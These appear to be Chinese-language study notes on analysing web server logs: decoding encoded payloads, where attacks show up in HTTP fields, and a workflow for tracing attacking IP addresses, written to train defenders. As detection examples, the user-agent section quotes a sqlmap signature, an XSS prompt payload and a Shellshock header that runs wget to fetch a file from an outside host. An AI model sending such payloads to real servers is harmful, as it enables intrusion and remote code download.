Web日志分析常见方法工具

1.编码 某web日志

URL 编码 BASE64编码 16进制编码（以\x开头） utf-8编码
字符集 Unicode（以\u、\u+、&#x、&#开头），gb2312，gbk
2.利用解码工具
http://www.mxcz.net/tools/Hex.aspx（推荐）

该网站能够支持多种编码，包括base64、url、unicode、UTF-8、GB2312、GBK、16进制等

3.数据提交方式
GET . POST . COOKIE

4.还原日志
防火墙 ：防火墙内置数据中心会记录数据包内容
态势感知：防火墙内置数据中心会记录数据包内容
中 的数据包内容 进行编码还原

URL编码还原
例：
POST /addnews.asp HTTP/1.1
title=%e5%b1%8c%e4%b8%9d%e7%9a%84%e9%80%86%e8%a2%ad

BASE64编码还原
例：
POST /addnews.asp HTTP/1.1
title=5bGM5Lid55qE6YCG6KKt==

如何分析日志

1.日志分析的目的
判断是否存在误判或漏盘 可以溯源攻击行为
分析NGAF和态势感知
2.攻击出现的位置
GET POST请求的 url/cookie/referer/user-agent 字段
post请求报文的表单字段
http应答页面

user-agent部分
恶意爬虫：Python-urllib/2.6、Baidu-YunGuanCe-ScanBot(ce.baidu.com)
扫描器：morfeus fucking scanner、Accept: acunetix/wvs
sql注入漏洞：sqlmap/1.0.8.15#dev (http://sqlmap.org)
xss攻击：’%22()%26%25<ScRiPt%20>prompt(961668)
其它非常特殊攻击 ：User-Agent: () { :; }; /bin/mkdir -p /share/HDB_DATA/…/ && /usr/bin/wget -q -c http://lliillii.altervista.org/io.php 0<&1 2>&1

http报文负载

在http报文头部，出现了一些不应该出现的字段url和post表单，referer、cookie出现了sql语句、系统命令、脚本代码(js代码、php代码)一般都不正常 访问或者探测了一些敏感文件 应答报文可能泄露一些系敏感信息的

webshell一句话木马 eval post 等

配置文件 访问 （格式…/…/）

敏感目录探测的 特殊后缀

网站扫描 出现 user-agent 字段中
AWVS appscan sql注入 或 爬虫

3.攻击常见的特点
连续性 产生多条日志
攻击一般都会借助工具进行，同一个IP地址日志间隔较小，可能一秒中产生几条日志，明显不是人操作浏览器的行为。
攻击者可能会借助一定跳板，如果IP地址是国外的，攻击嫌疑较大。

4.攻击日志分析流程
a.基于攻击ip地址 方法 找出筛选出攻击源ip地址
就可以看出攻击者发起的攻击
b.基于攻击方法分析
查看语句明显的攻击行为 或 结合其他参数
源ip 攻击时间 日志频率 攻击位置
报文语义分析（比如访问admin文件夹）
c.一些网站实现存在安全隐患，用户的一些正常流量，也可以被攻击者篡改，直接发起攻击。
url参数传递sql语句 js脚本 …/目录穿越 调用系统函数 域名重定向